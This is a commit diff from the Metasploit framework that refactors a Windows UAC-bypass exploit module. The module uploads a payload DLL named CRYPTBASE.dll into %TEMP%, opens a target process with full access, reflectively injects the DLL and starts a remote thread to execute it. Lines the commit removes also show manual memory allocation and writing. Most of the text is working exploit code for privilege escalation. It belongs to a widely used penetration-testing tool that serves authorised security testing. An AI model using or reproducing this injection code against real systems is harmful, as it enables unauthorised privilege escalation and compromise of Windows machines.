Further bypassuac tidies

Dont rescue Exception Use ReflectiveDLLInjection post mixin Dont keep retrieving %TEMP% path
2014-02-25 22:03:01 +00:00 · 2014-02-25 22:03:01 +00:00 · 6687ef80ee
parent b1dfed8577
commit 6687ef80ee
1 changed files with 11 additions and 32 deletions
--- a/modules/exploits/windows/local/bypassuac_injection.rb
+++ b/modules/exploits/windows/local/bypassuac_injection.rb
@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Local
  include Exploit::EXE
  include Post::File
  include Post::Windows::Priv
+  include Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super( update_info( info,
@ -124,14 +125,13 @@ class Metasploit3 < Msf::Exploit::Local

    check_permissions!

+    @temp_path = expand_path('%TEMP%').strip
+
    upload_payload_dll!

-    dll = ''
-    File.open(bypass_dll_path, "rb" ) { |f| dll += f.read(f.stat.size) }
-    offset = get_reflective_dll_offset(dll)
-
    pid = spawn_inject_proc
-    run_injection(pid, offset, dll)
+
+    run_injection(pid, bypass_dll_path)

    # delete the uac bypass payload
    vprint_status("Cleaning up payload file...")
@ -139,23 +139,8 @@ class Metasploit3 < Msf::Exploit::Local
  end


-
-  def get_reflective_dll_offset(dll)
-    pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
-
-    pe.exports.entries.each do |entry|
-      if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
-        return pe.rva_to_file_offset( entry.rva )
-      end
-    end
-
-    raise "Can't find an exported ReflectiveLoader function!"
-  end
-
-
-
-  def payload_filepath
-    "#{expand_path("%TEMP%").strip}\\CRYPTBASE.dll"
+  def payload_filepath(temp_path)
+    "#{@temp_path}\\CRYPTBASE.dll"
  end


@ -174,20 +159,14 @@ class Metasploit3 < Msf::Exploit::Local



-  def run_injection(pid, offset, dll)
+  def run_injection(pid, dll_path)
    vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
    begin
      vprint_status("Opening process #{pid}")
      host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
-      vprint_status("Allocating memory in procees #{pid}")
-      mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
-      # Ensure memory is set for execution
-      host_process.memory.protect(mem)
-      vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{dll.length} bytes")
-      vprint_status("Writing the payload into memory")
-      host_process.memory.write(mem, dll)
+      exploit_mem, offset = inject_dll_into_process(host_process, dll_path)
      vprint_status("Executing payload")
-      thread = host_process.thread.create(mem+offset, 0)
+      thread = host_process.thread.create(exploit_mem + offset, 0)
      print_good("Successfully injected payload in to process: #{pid}")
      client.railgun.kernel32.WaitForSingleObject(thread.handle,3000)
    rescue Rex::Post::Meterpreter::RequestError => e
@ -219,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Local
    begin
      vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
      write_file(payload_filepath, payload)
-    rescue ::Exception => e
+    rescue Rex::Post::Meterpreter::RequestError => e
      fail_with(
          Exploit::Exception::Unknown,
          "Error uploading file #{payload_filepath}: #{e.class} #{e}"